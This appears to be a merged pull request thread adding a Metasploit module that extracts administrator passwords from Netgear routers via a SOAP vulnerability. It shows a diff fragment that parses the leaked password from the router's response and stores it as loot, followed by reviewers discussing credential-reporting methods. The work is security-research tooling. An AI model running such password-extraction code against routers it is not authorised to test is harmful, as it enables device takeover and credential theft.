### PR TITLE
netgear soap password extractor

### PR DESCRIPTION
**Pull request by m-1-k-3**
This is the auxiliary module for the password extraction vulnerability from Peter Adkins here: https://github.com/darkarnium/secpub/tree/master/NetGear/SOAPWNDR

### CODE REVIEW

File: modules/auxiliary/admin/http/netgear_soap_password_extractor.rb [hunk 1]
```diff
@@ -0,0 +1,96 @@
...
+        loot = store_loot("netgear_soap_accoutn.config","text/plain",rhost, res.body)
+        print_good("#{peer} - Account details downloaded to: #{loot}")
+
+        res.body.each_line do |line|
+          if line =~ /<NewPassword>(.*)<\/NewPassword>/
+            pass = $1
+            vprint_good("user: admin")
+            vprint_good("pass: #{pass}")
+
+            report_auth_info(
```
Comment (m-1-k-3) [inline modules/auxiliary/admin/http/netgear_soap_password_extractor.rb]: this method is deprecated. What is the right way reporting credentials?

Comment (wvu-r7) [inline modules/auxiliary/admin/http/netgear_soap_password_extractor.rb]: You probably want ```create_credential``` and ```create_credential_login```.

**Comment by m-1-k-3** [comment]
changed the reporting and included the extraction of device details and firmware version

**Comment by jvazquez-r7** [comment]
Hello @m-1-k-3,

https://github.com/m-1-k-3/metasploit-framework/pull/13 tries to clean a little bit the code on here, could you review and land once you agree? Once landed this Pull request will be automatically updated.

Once ready, please, send us a pcap, and an screenshot of the module working, if possible with the "creds" command output after running the module, to the usual msfdev[at]metasploit.com and the pull request will be ready to go! Thanks!!!

**Comment by m-1-k-3** [comment]
will check it next week ... thanks @jvazquez-r7

**Comment by jvazquez-r7** [comment]
No rush, take your time! thanks!

**Comment by jvazquez-r7** [comment]
@m-1-k-3 see https://github.com/m-1-k-3/metasploit-framework/pull/14, thanks for pointing the bad branch on the prior PR!

**Comment by m-1-k-3** [comment]
looks good for me ...

msf_module_2015-05-21_08-14-20

**Comment by jvazquez-r7** [comment]
cool, thanks @m-1-k-3 landing!

**Pull request merged**